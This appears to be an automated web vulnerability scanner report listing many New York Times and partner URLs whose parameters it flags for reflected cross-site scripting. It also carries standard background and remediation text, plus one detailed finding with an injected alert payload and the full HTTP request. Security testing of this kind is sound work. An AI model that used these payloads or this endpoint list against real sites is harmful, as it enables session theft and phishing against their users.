http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/12/proposal-recommends-charging-admission-at-the-smithsonian/ [REST URL parameter 1]
http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/12/proposal-recommends-charging-admission-at-the-smithsonian/ [REST URL parameter 2]
http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/12/proposal-recommends-charging-admission-at-the-smithsonian/ [name of an arbitrarily supplied request parameter]
http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/12/the-week-in-culture-pictures-nov-12/ [REST URL parameter 1]
http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/12/the-week-in-culture-pictures-nov-12/ [REST URL parameter 1]
http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/12/the-week-in-culture-pictures-nov-12/ [REST URL parameter 2]
http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/12/the-week-in-culture-pictures-nov-12/ [name of an arbitrarily supplied request parameter]
http://community.nytimes.com/comments/opinionator.blogs.nytimes.com/2010/11/12/a-deficit-of-respect/ [REST URL parameter 1]
http://community.nytimes.com/comments/opinionator.blogs.nytimes.com/2010/11/12/a-deficit-of-respect/ [REST URL parameter 1]
http://community.nytimes.com/comments/opinionator.blogs.nytimes.com/2010/11/12/a-deficit-of-respect/ [REST URL parameter 2]
http://community.nytimes.com/comments/opinionator.blogs.nytimes.com/2010/11/12/a-deficit-of-respect/ [name of an arbitrarily supplied request parameter]
http://community.nytimes.com/comments/wheels.blogs.nytimes.com/2010/11/05/reviewing-the-2011-aston-martin-v-12-vantage/ [REST URL parameter 1]
http://community.nytimes.com/comments/wheels.blogs.nytimes.com/2010/11/05/reviewing-the-2011-aston-martin-v-12-vantage/ [REST URL parameter 1]
http://community.nytimes.com/comments/wheels.blogs.nytimes.com/2010/11/05/reviewing-the-2011-aston-martin-v-12-vantage/ [REST URL parameter 2]
http://community.nytimes.com/comments/wheels.blogs.nytimes.com/2010/11/05/reviewing-the-2011-aston-martin-v-12-vantage/ [name of an arbitrarily supplied request parameter]
http://dealbook.nytimes.com/2010/11/12/the-acquisition-of-tina-brown/ [src parameter]
http://digg.com/remote-submit [REST URL parameter 1]
http://dinersjournal.blogs.nytimes.com/2010/11/12/using-root-vegetables-raw/ [src parameter]
http://economix.blogs.nytimes.com/2010/11/12/a-high-water-mark-for-profits/ [src parameter]
http://frugaltraveler.blogs.nytimes.com/2010/10/19/does-jetblues-all-you-can-jet-pass-fill-you-up-users-respond/ [src parameter]
http://frugaltraveler.blogs.nytimes.com/2010/11/02/a-guide-to-the-caribbean-on-a-budget/ [src parameter]
http://frugaltraveler.blogs.nytimes.com/2010/11/10/biking-los-angeles/ [src parameter]
http://gadgetwise.blogs.nytimes.com/2010/11/12/ipad-apps-that-provide-recipes-and-avoid-strife/ [src parameter]
http://harpers.org/subjects/Sentences [REST URL parameter 2]
http://idolator.com/ [name of an arbitrarily supplied request parameter]
http://intransit.blogs.nytimes.com/2010/09/15/show-us-your-city/ [src parameter]
http://intransit.blogs.nytimes.com/2010/11/11/prague-art-show-embraces-decadence/ [src parameter]
http://intransit.blogs.nytimes.com/2010/11/11/qa-adding-angkor-to-a-vietnam-bike-trip/ [src parameter]
http://intransit.blogs.nytimes.com/2010/11/12/japans-high-speed-trains-lines-expand/ [src parameter]
http://intransit.blogs.nytimes.com/2010/11/12/paris-photo-fair-covers-the-spectrum/ [src parameter]
http://intransit.blogs.nytimes.com/2010/11/12/sunday-preview-66/ [src parameter]
http://lens.blogs.nytimes.com/2010/11/12/pictures-of-the-day-afghanistan-and-elsewhere-6/ [src parameter]
http://mediadecoder.blogs.nytimes.com/2010/11/12/judge-considers-case-of-mel-gibsons-leaky-court-file/ [src parameter]
http://motherjones.com/kevin-drum/2010/11/deficit-commission-serious [REST URL parameter 2]
http://motherjones.com/kevin-drum/2010/11/deficit-commission-serious [REST URL parameter 3]
http://motherjones.com/kevin-drum/2010/11/deficit-commission-serious [REST URL parameter 4]
http://movies.nytimes.com/2010/11/10/movies/10morning.html [name of an arbitrarily supplied request parameter]
http://movies.nytimes.com/2010/11/10/movies/10morning.html [src parameter]
http://movies.nytimes.com/2010/11/12/movies/12con.html [name of an arbitrarily supplied request parameter]
http://movies.nytimes.com/2010/11/12/movies/12con.html [ref parameter]
http://movies.nytimes.com/2010/11/12/movies/12cool.html [hpw parameter]
http://movies.nytimes.com/2010/11/12/movies/12cool.html [name of an arbitrarily supplied request parameter]
http://movies.nytimes.com/2010/11/12/movies/12cool.html [ref parameter]
http://movies.nytimes.com/2010/11/12/movies/12disco.html [name of an arbitrarily supplied request parameter]
http://movies.nytimes.com/2010/11/12/movies/12disco.html [ref parameter]
http://movies.nytimes.com/2010/11/12/movies/12eichmann.html [name of an arbitrarily supplied request parameter]
http://movies.nytimes.com/2010/11/12/movies/12eichmann.html [ref parameter]
http://movies.nytimes.com/2010/11/12/movies/12helena.html [name of an arbitrarily supplied request parameter]
http://movies.nytimes.com/2010/11/12/movies/12helena.html [ref parameter]
http://movies.nytimes.com/2010/11/12/movies/12magic.html [name of an arbitrarily supplied request parameter]
http://movies.nytimes.com/2010/11/12/movies/12magic.html [ref parameter]
http://movies.nytimes.com/2010/11/12/movies/12shake.html [name of an arbitrarily supplied request parameter]
http://movies.nytimes.com/2010/11/12/movies/12shake.html [ref parameter]
http://movies.nytimes.com/2010/11/12/movies/12tiny.html [name of an arbitrarily supplied request parameter]
http://movies.nytimes.com/2010/11/12/movies/12tiny.html [ref parameter]
http://movies.nytimes.com/2010/11/12/movies/12unstop.html [hpw parameter]
http://movies.nytimes.com/2010/11/12/movies/12unstop.html [name of an arbitrarily supplied request parameter]
http://movies.nytimes.com/2010/11/12/movies/12unstop.html [ref parameter]
http://movies.nytimes.com/2010/11/12/movies/12unstop.html [src parameter]
http://movies.nytimes.com/2010/11/13/movies/13sky.html [hpw parameter]
http://movies.nytimes.com/2010/11/13/movies/13sky.html [name of an arbitrarily supplied request parameter]
http://movies.nytimes.com/movie/401469/Unstoppable/overview [name of an arbitrarily supplied request parameter]
http://nahright.com/news/ [name of an arbitrarily supplied request parameter]
http://opinionator.blogs.nytimes.com/2010/11/11/a-republican-for-higher-taxes/ [src parameter]
http://opinionator.blogs.nytimes.com/2010/11/12/a-deficit-of-respect/ [src parameter]
http://opinionator.blogs.nytimes.com/2010/11/12/the-ways-of-empathy/ [src parameter]
http://opinionator.blogs.nytimes.com/category/alec-soth [REST URL parameter 2]
http://opinionator.blogs.nytimes.com/category/alec-soth/feed/ [REST URL parameter 3]
http://opinionator.blogs.nytimes.com/category/alec-soth/page/2/ [REST URL parameter 3]
http://opinionator.blogs.nytimes.com/category/allison-arieff [REST URL parameter 2]
http://opinionator.blogs.nytimes.com/category/allison-arieff/feed/ [REST URL parameter 3]
http://opinionator.blogs.nytimes.com/category/allison-arieff/page/2/ [REST URL parameter 3]
http://opinionator.blogs.nytimes.com/category/dick-cavett [REST URL parameter 2]
http://opinionator.blogs.nytimes.com/category/dick-cavett/feed/ [REST URL parameter 3]
http://opinionator.blogs.nytimes.com/category/dick-cavett/page/2/ [REST URL parameter 3]
http://opinionator.blogs.nytimes.com/category/disunion [REST URL parameter 2]
http://opinionator.blogs.nytimes.com/category/disunion/ [REST URL parameter 2]
http://opinionator.blogs.nytimes.com/category/disunion/feed/ [REST URL parameter 3]
http://opinionator.blogs.nytimes.com/category/disunion/page/2/ [REST URL parameter 3]
http://opinionator.blogs.nytimes.com/category/errol-morris [REST URL parameter 2]
http://opinionator.blogs.nytimes.com/category/errol-morris/feed/ [REST URL parameter 3]
http://opinionator.blogs.nytimes.com/category/errol-morris/page/2/ [REST URL parameter 3]
http://opinionator.blogs.nytimes.com/category/fixes [REST URL parameter 2]
http://opinionator.blogs.nytimes.com/category/fixes/ [REST URL parameter 2]
http://opinionator.blogs.nytimes.com/category/fixes/feed/ [REST URL parameter 3]
http://opinionator.blogs.nytimes.com/category/fixes/page/2/ [REST URL parameter 3]
http://opinionator.blogs.nytimes.com/category/home-fires [REST URL parameter 2]
http://opinionator.blogs.nytimes.com/category/home-fires/ [REST URL parameter 2]
http://opinionator.blogs.nytimes.com/category/home-fires/feed/ [REST URL parameter 3]
http://opinionator.blogs.nytimes.com/category/home-fires/page/2/ [REST URL parameter 3]
http://opinionator.blogs.nytimes.com/category/linda-greenhouse [REST URL parameter 2]
http://opinionator.blogs.nytimes.com/category/linda-greenhouse/ [REST URL parameter 2]
http://opinionator.blogs.nytimes.com/category/linda-greenhouse/feed/ [REST URL parameter 3]
http://opinionator.blogs.nytimes.com/category/linda-greenhouse/page/2/ [REST URL parameter 3]
http://opinionator.blogs.nytimes.com/category/line-by-line [REST URL parameter 2]
http://opinionator.blogs.nytimes.com/category/line-by-line/ [REST URL parameter 2]
http://opinionator.blogs.nytimes.com/category/line-by-line/feed/ [REST URL parameter 3]
http://opinionator.blogs.nytimes.com/category/line-by-line/page/2/ [REST URL parameter 3]
http://opinionator.blogs.nytimes.com/category/living-rooms [REST URL parameter 2]
http://opinionator.blogs.nytimes.com/category/living-rooms/feed/ [REST URL parameter 3]
http://opinionator.blogs.nytimes.com/category/living-rooms/page/2/ [REST URL parameter 3]
http://opinionator.blogs.nytimes.com/category/peter-orszag [REST URL parameter 2]
http://opinionator.blogs.nytimes.com/category/peter-orszag/ [REST URL parameter 2]
http://opinionator.blogs.nytimes.com/category/peter-orszag/feed/ [REST URL parameter 3]
http://opinionator.blogs.nytimes.com/category/peter-orszag/page/2/ [REST URL parameter 3]
http://opinionator.blogs.nytimes.com/category/robert-wright [REST URL parameter 2]
http://opinionator.blogs.nytimes.com/category/robert-wright/ [REST URL parameter 2]
http://opinionator.blogs.nytimes.com/category/robert-wright/feed/ [REST URL parameter 3]
http://opinionator.blogs.nytimes.com/category/robert-wright/page/2/ [REST URL parameter 3]
http://opinionator.blogs.nytimes.com/category/stanley-fish [REST URL parameter 2]
http://opinionator.blogs.nytimes.com/category/stanley-fish/ [REST URL parameter 2]
http://opinionator.blogs.nytimes.com/category/stanley-fish/feed/ [REST URL parameter 3]
http://opinionator.blogs.nytimes.com/category/stanley-fish/page/2/ [REST URL parameter 3]
http://opinionator.blogs.nytimes.com/category/the-conversation [REST URL parameter 2]
http://opinionator.blogs.nytimes.com/category/the-conversation/ [REST URL parameter 2]
http://opinionator.blogs.nytimes.com/category/the-conversation/feed/ [REST URL parameter 3]
http://opinionator.blogs.nytimes.com/category/the-conversation/page/2/ [REST URL parameter 3]
http://opinionator.blogs.nytimes.com/category/the-score [REST URL parameter 2]
http://opinionator.blogs.nytimes.com/category/the-score/feed/ [REST URL parameter 3]
http://opinionator.blogs.nytimes.com/category/the-score/page/2/ [REST URL parameter 3]
http://opinionator.blogs.nytimes.com/category/the-stone [REST URL parameter 2]
http://opinionator.blogs.nytimes.com/category/the-stone/ [REST URL parameter 2]
http://opinionator.blogs.nytimes.com/category/the-stone/feed/ [REST URL parameter 3]
http://opinionator.blogs.nytimes.com/category/the-stone/page/2/ [REST URL parameter 3]
http://opinionator.blogs.nytimes.com/category/the-thread [REST URL parameter 2]
http://opinionator.blogs.nytimes.com/category/the-thread/ [REST URL parameter 2]
http://opinionator.blogs.nytimes.com/category/the-thread/feed/ [REST URL parameter 3]
http://opinionator.blogs.nytimes.com/category/the-thread/page/2/ [REST URL parameter 3]
http://opinionator.blogs.nytimes.com/category/timothy-egan [REST URL parameter 2]
http://opinionator.blogs.nytimes.com/category/timothy-egan/ [REST URL parameter 2]
http://opinionator.blogs.nytimes.com/category/timothy-egan/feed/ [REST URL parameter 3]
http://opinionator.blogs.nytimes.com/category/timothy-egan/page/2/ [REST URL parameter 3]
http://opinionator.blogs.nytimes.com/category/townie [REST URL parameter 2]
http://opinionator.blogs.nytimes.com/category/townie/page/2/ [REST URL parameter 3]
http://opinionator.blogs.nytimes.com/category/townies/ [REST URL parameter 2]
http://opinionator.blogs.nytimes.com/category/townies/feed [REST URL parameter 3]
http://opinionator.blogs.nytimes.com/category/william-d-cohan [REST URL parameter 2]
http://opinionator.blogs.nytimes.com/category/william-d-cohan/ [REST URL parameter 2]
http://opinionator.blogs.nytimes.com/category/william-d-cohan/feed/ [REST URL parameter 3]
http://opinionator.blogs.nytimes.com/category/william-d-cohan/page/2/ [REST URL parameter 3]
http://opinionator.blogs.nytimes.com/tag/alan-simpson/ [REST URL parameter 2]
http://opinionator.blogs.nytimes.com/tag/budget/ [REST URL parameter 2]
http://opinionator.blogs.nytimes.com/tag/erskine-bowles/ [REST URL parameter 2]
http://opinionator.blogs.nytimes.com/tag/federal-deficit/ [REST URL parameter 2]
http://opinionator.blogs.nytimes.com/tag/health-care-reform/ [REST URL parameter 2]
http://opinionator.blogs.nytimes.com/tag/social-security/ [REST URL parameter 2]
http://opinionator.blogs.nytimes.com/tag/taxes/ [REST URL parameter 2]
https://placead.nytimes.com/default.asp [CategoryID parameter]
http://prescriptions.blogs.nytimes.com/2010/11/12/group-says-camel-packs-lure-the-young/ [src parameter]
http://scientistatwork.blogs.nytimes.com/2010/11/12/drought-in-the-amazon-up-close-and-personal/ [src parameter]
http://scientistatwork.blogs.nytimes.com/2010/11/12/in-the-remote-pacific-glimpses-of-pristine-corals/ [src parameter]
http://south-korea.travel.asia.com/cheap-flights-country/South-Korea/Search-South-Korea-Discount-Flights-And-Save [REST URL parameter 1]
http://south-korea.travel.asia.com/cheap-flights-country/South-Korea/Search-South-Korea-Discount-Flights-And-Save [REST URL parameter 1]
http://south-korea.travel.asia.com/cheap-flights-country/South-Korea/Search-South-Korea-Discount-Flights-And-Save [REST URL parameter 2]
http://south-korea.travel.asia.com/cheap-flights-country/South-Korea/Search-South-Korea-Discount-Flights-And-Save [REST URL parameter 2]
http://south-korea.travel.asia.com/cheap-flights-country/South-Korea/Search-South-Korea-Discount-Flights-And-Save [REST URL parameter 2]
http://south-korea.travel.asia.com/cheap-flights-country/South-Korea/Search-South-Korea-Discount-Flights-And-Save [REST URL parameter 3]
http://south-korea.travel.asia.com/cheap-flights-country/South-Korea/Search-South-Korea-Discount-Flights-And-Save [REST URL parameter 3]
http://theater.nytimes.com/2010/11/11/theater/reviews/11play.html [name of an arbitrarily supplied request parameter]
http://theater.nytimes.com/2010/11/11/theater/reviews/11play.html [ref parameter]
http://theater.nytimes.com/2010/11/12/theater/reviews/12peewee.html [hpw parameter]
http://theater.nytimes.com/2010/11/12/theater/reviews/12peewee.html [name of an arbitrarily supplied request parameter]
http://theater.nytimes.com/2010/11/12/theater/reviews/12peewee.html [ref parameter]
http://theater.nytimes.com/2010/11/12/theater/reviews/12peewee.html [src parameter]
http://theater.nytimes.com/2010/11/12/theater/reviews/12radio.html [name of an arbitrarily supplied request parameter]
http://theater.nytimes.com/2010/11/12/theater/reviews/12radio.html [ref parameter]
http://theater.nytimes.com/2010/11/12/theater/reviews/12throne.html [hpw parameter]
http://theater.nytimes.com/2010/11/12/theater/reviews/12throne.html [name of an arbitrarily supplied request parameter]
http://theater.nytimes.com/2010/11/12/theater/reviews/12throne.html [ref parameter]
http://theater.nytimes.com/2010/11/13/theater/reviews/13notes.html [hpw parameter]
http://theater.nytimes.com/2010/11/13/theater/reviews/13notes.html [name of an arbitrarily supplied request parameter]
http://theater.nytimes.com/2010/11/13/theater/reviews/13notes.html [src parameter]
http://thecaucus.blogs.nytimes.com/2010/11/12/gov-perry-to-lead-republican-governors/ [src parameter]
http://thequad.blogs.nytimes.com/2010/11/12/quad-qa-sienas-ryan-rossiter/ [src parameter]
http://thequad.blogs.nytimes.com/2010/11/12/weekly-pick-em-crunch-time-in-the-sec/ [src parameter]
http://tmagazine.blogs.nytimes.com/2010/11/12/look-of-the-moment-v-b-s-tangerine-dream/ [src parameter]
http://topics.blogs.nytimes.com/tag/after-deadline/ [REST URL parameter 2]
http://topics.blogs.nytimes.com/tag/bees/ [REST URL parameter 2]
http://topics.blogs.nytimes.com/tag/coffee/ [REST URL parameter 2]
http://topics.blogs.nytimes.com/tag/composting/ [REST URL parameter 2]
http://trc.taboolasyndication.com/dispatch [item-type parameter]
http://trc.taboolasyndication.com/dispatch [list-id parameter]
http://trc.taboolasyndication.com/dispatch [publisher parameter]
http://us.blackberry.com/smartphones/blackberrytorch.jsp [REST URL parameter 2]
http://video.nytimes.com/ [name of an arbitrarily supplied request parameter]
http://video.nytimes.com/ [src parameter]
http://video.nytimes.com/video/2010/10/15/dining/1248068993504/quick-preserved-lemons.html [name of an arbitrarily supplied request parameter]
http://video.nytimes.com/video/2010/10/21/continuous/1248069216552/timescast-october-21-2010.html [REST URL parameter 2]
http://video.nytimes.com/video/2010/10/21/continuous/1248069216552/timescast-october-21-2010.html [REST URL parameter 3]
http://video.nytimes.com/video/2010/10/21/continuous/1248069216552/timescast-october-21-2010.html [REST URL parameter 4]
http://video.nytimes.com/video/2010/10/21/continuous/1248069216552/timescast-october-21-2010.html [REST URL parameter 5]
http://video.nytimes.com/video/2010/10/21/continuous/1248069216552/timescast-october-21-2010.html [REST URL parameter 5]
http://video.nytimes.com/video/2010/10/21/continuous/1248069216552/timescast-october-21-2010.html [REST URL parameter 5]
http://video.nytimes.com/video/2010/10/21/continuous/1248069216552/timescast-october-21-2010.html [name of an arbitrarily supplied request parameter]
http://video.nytimes.com/video/2010/10/22/dining/1248068993538/ricotta-cheese-gnocchi.html [REST URL parameter 2]
http://video.nytimes.com/video/2010/10/22/dining/1248068993538/ricotta-cheese-gnocchi.html [REST URL parameter 3]
http://video.nytimes.com/video/2010/10/22/dining/1248068993538/ricotta-cheese-gnocchi.html [REST URL parameter 4]
http://video.nytimes.com/video/2010/10/22/dining/1248068993538/ricotta-cheese-gnocchi.html [REST URL parameter 5]
http://video.nytimes.com/video/2010/10/22/dining/1248068993538/ricotta-cheese-gnocchi.html [REST URL parameter 5]
http://video.nytimes.com/video/2010/10/22/dining/1248068993538/ricotta-cheese-gnocchi.html [REST URL parameter 5]
http://video.nytimes.com/video/2010/10/22/dining/1248068993538/ricotta-cheese-gnocchi.html [name of an arbitrarily supplied request parameter]
http://video.nytimes.com/video/2010/10/22/nyregion/1248069217296/city-critic-patrolling-the-city.html [REST URL parameter 2]
http://video.nytimes.com/video/2010/10/22/nyregion/1248069217296/city-critic-patrolling-the-city.html [REST URL parameter 3]
http://video.nytimes.com/video/2010/10/22/nyregion/1248069217296/city-critic-patrolling-the-city.html [name of an arbitrarily supplied request parameter]
http://video.nytimes.com/video/2010/10/23/world/asia/1248069229316/chinas-new-wave-music-festivals.html [REST URL parameter 2]
http://video.nytimes.com/video/2010/10/23/world/asia/1248069229316/chinas-new-wave-music-festivals.html [REST URL parameter 3]
http://video.nytimes.com/video/2010/10/23/world/asia/1248069229316/chinas-new-wave-music-festivals.html [REST URL parameter 4]
http://video.nytimes.com/video/2010/10/23/world/asia/1248069229316/chinas-new-wave-music-festivals.html [REST URL parameter 5]
http://video.nytimes.com/video/2010/10/23/world/asia/1248069229316/chinas-new-wave-music-festivals.html [REST URL parameter 5]
http://video.nytimes.com/video/2010/10/23/world/asia/1248069229316/chinas-new-wave-music-festivals.html [REST URL parameter 5]
http://video.nytimes.com/video/2010/10/23/world/asia/1248069229316/chinas-new-wave-music-festivals.html [REST URL parameter 6]
http://video.nytimes.com/video/2010/10/23/world/asia/1248069229316/chinas-new-wave-music-festivals.html [REST URL parameter 6]
http://video.nytimes.com/video/2010/10/23/world/asia/1248069229316/chinas-new-wave-music-festivals.html [REST URL parameter 6]
http://video.nytimes.com/video/2010/10/23/world/asia/1248069229316/chinas-new-wave-music-festivals.html [name of an arbitrarily supplied request parameter]
http://video.nytimes.com/video/2010/10/25/continuous/1248069237870/timescast-october-25-2010.html [REST URL parameter 2]
http://video.nytimes.com/video/2010/10/25/continuous/1248069237870/timescast-october-25-2010.html [REST URL parameter 3]
http://video.nytimes.com/video/2010/10/25/continuous/1248069237870/timescast-october-25-2010.html [REST URL parameter 4]
http://video.nytimes.com/video/2010/10/25/continuous/1248069237870/timescast-october-25-2010.html [REST URL parameter 5]
http://video.nytimes.com/video/2010/10/25/continuous/1248069237870/timescast-october-25-2010.html [REST URL parameter 5]
http://video.nytimes.com/video/2010/10/25/continuous/1248069237870/timescast-october-25-2010.html [REST URL parameter 5]
http://video.nytimes.com/video/2010/10/25/continuous/1248069237870/timescast-october-25-2010.html [name of an arbitrarily supplied request parameter]
http://video.nytimes.com/video/2010/10/28/movies/1248069253174/creating-monsters.html [REST URL parameter 2]
http://video.nytimes.com/video/2010/10/28/movies/1248069253174/creating-monsters.html [REST URL parameter 3]
http://video.nytimes.com/video/2010/10/28/movies/1248069253174/creating-monsters.html [REST URL parameter 4]
http://video.nytimes.com/video/2010/10/28/movies/1248069253174/creating-monsters.html [REST URL parameter 5]
http://video.nytimes.com/video/2010/10/28/movies/1248069253174/creating-monsters.html [REST URL parameter 5]
http://video.nytimes.com/video/2010/10/28/movies/1248069253174/creating-monsters.html [REST URL parameter 5]
http://video.nytimes.com/video/2010/10/28/movies/1248069253174/creating-monsters.html [REST URL parameter 6]
http://video.nytimes.com/video/2010/10/28/movies/1248069253174/creating-monsters.html [REST URL parameter 7]
http://video.nytimes.com/video/2010/10/28/movies/1248069253174/creating-monsters.html [name of an arbitrarily supplied request parameter]
http://video.nytimes.com/video/2010/11/05/business/1248069286134/citigroup-prevails-in-emi-lawsuit.html [REST URL parameter 2]
http://video.nytimes.com/video/2010/11/05/business/1248069286134/citigroup-prevails-in-emi-lawsuit.html [REST URL parameter 3]
http://video.nytimes.com/video/2010/11/05/business/1248069286134/citigroup-prevails-in-emi-lawsuit.html [REST URL parameter 4]
http://video.nytimes.com/video/2010/11/05/business/1248069286134/citigroup-prevails-in-emi-lawsuit.html [name of an arbitrarily supplied request parameter]
http://video.nytimes.com/video/2010/11/05/sports/1248069286580/zenyatta-competes-at-the-breeders-cup.html [REST URL parameter 2]
http://video.nytimes.com/video/2010/11/05/sports/1248069286580/zenyatta-competes-at-the-breeders-cup.html [REST URL parameter 3]
http://video.nytimes.com/video/2010/11/05/sports/1248069286580/zenyatta-competes-at-the-breeders-cup.html [REST URL parameter 4]
http://video.nytimes.com/video/2010/11/05/sports/1248069286580/zenyatta-competes-at-the-breeders-cup.html [REST URL parameter 5]
http://video.nytimes.com/video/2010/11/05/sports/1248069286580/zenyatta-competes-at-the-breeders-cup.html [REST URL parameter 5]
http://video.nytimes.com/video/2010/11/05/sports/1248069286580/zenyatta-competes-at-the-breeders-cup.html [REST URL parameter 5]
http://video.nytimes.com/video/2010/11/05/sports/1248069286580/zenyatta-competes-at-the-breeders-cup.html [REST URL parameter 6]
http://video.nytimes.com/video/2010/11/05/sports/1248069286580/zenyatta-competes-at-the-breeders-cup.html [REST URL parameter 7]
http://video.nytimes.com/video/2010/11/05/sports/1248069286580/zenyatta-competes-at-the-breeders-cup.html [name of an arbitrarily supplied request parameter]
http://video.nytimes.com/video/2010/11/08/business/media/1248069229412/chinese-animation-.html [REST URL parameter 2]
http://video.nytimes.com/video/2010/11/08/business/media/1248069229412/chinese-animation-.html [REST URL parameter 3]
http://video.nytimes.com/video/2010/11/08/business/media/1248069229412/chinese-animation-.html [REST URL parameter 4]
http://video.nytimes.com/video/2010/11/08/business/media/1248069229412/chinese-animation-.html [name of an arbitrarily supplied request parameter]
http://video.nytimes.com/video/2010/11/08/world/1248069302724/timescast-november-8-2010.html [REST URL parameter 2]
http://video.nytimes.com/video/2010/11/08/world/1248069302724/timescast-november-8-2010.html [name of an arbitrarily supplied request parameter]
http://video.nytimes.com/video/2010/11/08/world/europe/1248069280321/troubles-on-russias-lake-baikal.html [REST URL parameter 2]
http://video.nytimes.com/video/2010/11/08/world/europe/1248069280321/troubles-on-russias-lake-baikal.html [REST URL parameter 3]
http://video.nytimes.com/video/2010/11/08/world/europe/1248069280321/troubles-on-russias-lake-baikal.html [REST URL parameter 4]
http://video.nytimes.com/video/2010/11/08/world/europe/1248069280321/troubles-on-russias-lake-baikal.html [REST URL parameter 5]
http://video.nytimes.com/video/2010/11/08/world/europe/1248069280321/troubles-on-russias-lake-baikal.html [REST URL parameter 5]
http://video.nytimes.com/video/2010/11/08/world/europe/1248069280321/troubles-on-russias-lake-baikal.html [REST URL parameter 5]
http://video.nytimes.com/video/2010/11/08/world/europe/1248069280321/troubles-on-russias-lake-baikal.html [name of an arbitrarily supplied request parameter]
http://video.nytimes.com/video/2010/11/09/business/1248069304600/fed-move-not-enough.html [name of an arbitrarily supplied request parameter]
http://video.nytimes.com/video/2010/11/11/dining/1248069312941/tipsy-diaries-beans-with-booze.html [name of an arbitrarily supplied request parameter]
http://video.nytimes.com/video/2010/11/12/business/1248069282083/a-recovery-for-wall-street-pay.html [REST URL parameter 2]
http://video.nytimes.com/video/2010/11/12/business/1248069282083/a-recovery-for-wall-street-pay.html [REST URL parameter 3]
http://video.nytimes.com/video/2010/11/12/business/1248069282083/a-recovery-for-wall-street-pay.html [REST URL parameter 4]
http://video.nytimes.com/video/2010/11/12/business/1248069282083/a-recovery-for-wall-street-pay.html [name of an arbitrarily supplied request parameter]
http://video.nytimes.com/video/2010/11/12/business/1248069321928/straining-to-make-mid-market-deals.html [REST URL parameter 2]
http://video.nytimes.com/video/2010/11/12/business/1248069321928/straining-to-make-mid-market-deals.html [REST URL parameter 3]
http://video.nytimes.com/video/2010/11/12/business/1248069321928/straining-to-make-mid-market-deals.html [REST URL parameter 4]
http://video.nytimes.com/video/2010/11/12/business/1248069321928/straining-to-make-mid-market-deals.html [name of an arbitrarily supplied request parameter]
http://video.nytimes.com/video/2010/11/12/multimedia/1248069223837/bayous-quagmire-for-goldman.html [name of an arbitrarily supplied request parameter]
http://video.nytimes.com/video/2010/11/12/world/1248069321921/timescast-november-12-2010.html [name of an arbitrarily supplied request parameter]
http://video.on.nytimes.com/ [name of an arbitrarily supplied request parameter]
http://homedelivery.nytimes.com/ [Referer HTTP header]
http://ipboutiquehotel.com/ [Referer HTTP header]

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Remediation background

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:

Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (< > etc).

In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.

3.1. http://ad.vulnerable.ad.partner/adj/N3282.nytimes.comSD6440/B3948326.5 [ad parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.vulnerable.ad.partner
Path:	/adj/N3282.nytimes.comSD6440/B3948326.5

Issue detail

The value of the ad request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f9b9f'-alert(1)-'8238608c5a5 was submitted in the ad parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N3282.nytimes.comSD6440/B3948326.5;p=%99qnz%C8ot;sz=88x31;pc=nyt146056_247966;ord=2010.11.13.01.44.23;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=homepage.nytimes.com/index.html&pos=Middle1C&camp=ING_Direct_2010_02_1474596-nyt1&ad=88x31_SiteSearch_Nov_B3948326.5f9b9f'-alert(1)-'8238608c5a5&sn2=ead05e9b/336cb178&snr=doubleclick&snx=1289611247&sn1=70abef3d/22b41b61&goto= HTTP/1.1
Accept: */*
Referer: http://www.nytimes.com/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: ad.vulnerable.ad.partner
Proxy-Connection: Keep-Alive
Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9

Response

HTTP/1.1 200 OK
